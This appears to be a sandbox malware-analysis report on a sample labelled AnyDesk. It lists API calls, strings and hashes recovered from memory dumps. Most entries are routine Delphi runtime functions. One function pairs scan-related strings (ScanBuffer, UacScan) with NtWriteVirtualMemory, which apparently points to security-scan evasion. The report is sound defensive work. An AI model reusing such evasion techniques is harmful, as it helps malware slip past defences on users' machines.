lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B259D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000), ref: 02B25A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C), ref: 02B25A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B25A99

Strings

GetLongPathNameA, xrefs: 02B25933
kernel32.dll, xrefs: 02B25920
\, xrefs: 02B25A49

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: b0c095bb0bf7f1e9d1aae1e1328f68eb2124dcdd9a5bbbbb2169f4990aefa3e5
Instruction ID: 0b7cb04d240dfb554d813b998aa95e9f5118c1ed1e564cf7da276c3069c879e0
Opcode Fuzzy Hash: b0c095bb0bf7f1e9d1aae1e1328f68eb2124dcdd9a5bbbbb2169f4990aefa3e5
Instruction Fuzzy Hash: C8415B71D00739ABDB24DAE8CC88ADEB7BDEF09350F4445E5A59CE7242E7709A488F50

Function 02B25BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25CEB

Strings

Software\Borland\Locales, xrefs: 02B25AFC, 02B25B1A
Software\Borland\Delphi\Locales, xrefs: 02B25B38

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: 8dc248f859a430fb408fec0d2a24f57845c5ea6104e705d009ffd408c8dfb311
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: 8B317571E4037C2AEB39D6B89C45FDE77AD9B04380F4441E2A64CE6186E674DE8C8F91

Function 02B3894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,UacScan), ref: 02B38960
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B3897A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize), ref: 02B389B6

Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC

Strings

bcrypt, xrefs: 02B3895F
BCryptVerifySignature, xrefs: 02B38973

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 3585b368c3b0247f116304d18df68e8fde76a133f591937452795b9412b13eb2
Instruction ID: 4a6b554986fd7aec7b11526d40817cb57ca0d968e661c03bd8bac15f5f2b4983
Opcode Fuzzy Hash: 3585b368c3b0247f116304d18df68e8fde76a133f591937452795b9412b13eb2
Instruction Fuzzy Hash: C7F0C8B1ECD3146EE3119668AC6AF9FF7DCD740794F0249A9BD0C87150CFB01856AB51

Function 02B3DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02B24F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DD5E), ref: 02B3DCCB
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DD05
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DD32
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DD3B

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 3eb52535c3509ff0cf85c6c910b36325bc12f5b139f3d8b89b923aff95a153f5
Instruction ID: b872fd25942091f5ca111170281ee2489da16f463b3ecc3cda2ebba0080d612f
Opcode Fuzzy Hash: 3eb52535c3509ff0cf85c6c910b36325bc12f5b139f3d8b89b923aff95a153f5
Instruction Fuzzy Hash: 6421ED71A40319BEEB11EBA4CD42FDEB7BDEB04B00F6144A1B604F75D0EBB06A048A65

Function 02B3DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlI.N(?,?,00000000,02B3DC7E), ref: 02B3DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC61

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: e3326fa2756e6e925606703042b8677a8d5707d277b2e80f54409fc22b144260
Instruction ID: 85ff16081110cb31d9767131a6c44558c36dc7c9b162b9582f4876de1a7d02fe
Opcode Fuzzy Hash: e3326fa2756e6e925606703042b8677a8d5707d277b2e80f54409fc22b144260
Instruction Fuzzy Hash: 14016275A4434A6EEB06DBA09D41FCD77BDAB44704F9144D2E200E7081EAB4AB088B24

Function 02B3DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B24F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24F2E

RtlI.N(?,?,00000000,02B3DC7E), ref: 02B3DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC61

Part of subcall function 02B24C60: SysFreeString.OLEAUT32(02B3F4A4), ref: 02B24C6E

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: fde314fa8e81fae998612f4f85ab2284b533527a93b5974880ef89a6bb5854ba
Instruction ID: b47fee13208a3d5a14acc9dc94f68469a0b6746d158a8fc4f460c1e531ce914a
Opcode Fuzzy Hash: fde314fa8e81fae998612f4f85ab2284b533527a93b5974880ef89a6bb5854ba
Instruction Fuzzy Hash: 4E01F47595020DBEDB11EBA0DD42FCDB3BDEB48700F9144E1E605E3590EA746B048E64

Function 02B27FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B27FF5

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction ID: 43cd47514363f0e0267dde2e6a8de58086e869b14b3bfca44dd98a54a4ea7ae6
Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction Fuzzy Hash: EC1100B5A00209AF9B04CF99C981DBFF7F9FFC8710B54C569A409E7250E6719A018B90

Function 02B2A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: 0a5bc45ad0a84464a6d6a42a61aa4439f059a01660daaff2929659e5972d36c2
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: 4BE09271B0033417D311A5589C80EE6726D9B58310F0042EAA94DC7385EDA09E884AE9

Function 02B2B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02B4D106,00000000,02B4D11E), ref: 02B2B79A

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c0e0908de1d13b43cb1066174ea324651776ad894baebff7494fffdbb3e84bb8
Instruction ID: bf118515fa089df0fd021957e0360cf2fb9754c1cb726cd668afbfafe6db4d59
Opcode Fuzzy Hash: c0e0908de1d13b43cb1066174ea324651776ad894baebff7494fffdbb3e84bb8
Instruction Fuzzy Hash: C7F0B2789443129FD350DF28D481B1677E9FB487A4F008DA9EA98C7790EB38D818CF52

Function 02B2A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B2BE72,00000000,02B2C08B,?,?,00000000,00000000), ref: 02B2A823

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: dbc4ce7e04a6d3714e0a4aae4e14bc87c4aae5ea28ffd35882467f40cdee3022
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: B1D05B6230D3702AA210515A2D44D775ADCCBC5761F004079B94CC6101D2048C0BD6B2

Function 02B2920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02B29210

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: 03575fff07f93704ff0d6e9cac5d0f985efb9595365ae23e775b74532ca9dc52
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: FDA0125040493041854033180C0257431445921A20FC4878068FC402D4E91D01248093

Function 02B4E596 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 843edd10fda94fe15995e29e877b0b49e4e20478cce956a803627c395e7f0f90
Instruction ID: 10f1ddb9a3d4326aa61ecdada740af09cdca900789dcf777f4dd720a92ae648e
Opcode Fuzzy Hash: 843edd10fda94fe15995e29e877b0b49e4e20478cce956a803627c395e7f0f90
Instruction Fuzzy Hash: 8C514E9241D3C24FC7634F7484E52D23F62BD6752874E11DAC8D09F163E61A994BDB21

Function 02B220C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02B2D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B2D29D

Part of subcall function 02B2D268: GetProcAddress.KERNEL32(00000000), ref: 02B2D281

Strings

VariantChangeTypeEx, xrefs: 02B2D2AB
VarBstrFromDate, xrefs: 02B2D463
VarAdd, xrefs: 02B2D2ED
VarCyFromStr, xrefs: 02B2D421
VarMod, xrefs: 02B2D35B
VarSub, xrefs: 02B2D303
VarBoolFromStr, xrefs: 02B2D437
VarNeg, xrefs: 02B2D2C1
VarOr, xrefs: 02B2D387
VarXor, xrefs: 02B2D39D
VarDiv, xrefs: 02B2D32F
oleaut32.dll, xrefs: 02B2D298
VarMul, xrefs: 02B2D319
VarR8FromStr, xrefs: 02B2D3F5
VarBstrFromCy, xrefs: 02B2D44D
VarIdiv, xrefs: 02B2D345
VarDateFromStr, xrefs: 02B2D40B
VarAnd, xrefs: 02B2D371
VarNot, xrefs: 02B2D2D7
VarCmp, xrefs: 02B2D3B3
VarI4FromStr, xrefs: 02B2D3C9
VarBstrFromBool, xrefs: 02B2D479
VarR4FromStr, xrefs: 02B2D3DF

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 3007e7fb1e96cc8c67bbcb1d6ef9482028db102c40754be7a10a44672539ef12
Instruction ID: 3b936491de65e2172321b681cc5d950b2e3e0300963469038a2a33634f3b0115
Opcode Fuzzy Hash: 3007e7fb1e96cc8c67bbcb1d6ef9482028db102c40754be7a10a44672539ef12
Instruction Fuzzy Hash: AD41EB63A8C32A5B52046A6DB40142BF79ED749B503B046DAF48C8B784DD30FC9D9EA9

Function 02B36ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B36EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B36EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B36EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B36F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B36F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B36F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B36F3F

Strings

CoAddRefServerProcess, xrefs: 02B36F09
CoInitializeEx, xrefs: 02B36EF9
CoSuspendClassObjects, xrefs: 02B36F39
CoCreateInstanceEx, xrefs: 02B36EE9
CoResumeClassObjects, xrefs: 02B36F29
CoReleaseServerProcess, xrefs: 02B36F19
ole32.dll, xrefs: 02B36ED9

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: c50f91dac33f8aa891c4d115060ed1a8387e796b399ea5412f9b58c33e52bda0
Instruction ID: 2c5f43d49082b2769e29cdc03a67feb11305cd1ff5ad48c24c5128cb0445a20b
Opcode Fuzzy Hash: c50f91dac33f8aa891c4d115060ed1a8387e796b399ea5412f9b58c33e52bda0
Instruction Fuzzy Hash: 16F0ACF4AC93507DBA03BB705CC1866379DB7207447001CD6B917D6952E675D4188F25

Function 02B22530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B228CE

Strings

Unexpected Memory Leak, xrefs: 02B228C0
bytes: , xrefs: 02B2275D
, xrefs: 02B22814
7, xrefs: 02B226A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
An unexpected memory leak has occurred. , xrefs: 02B22690
Unknown, xrefs: 02B2278C
String, xrefs: 02B227A1
The unexpected small block leaks are:, xrefs: 02B22707

Memory Dump Source

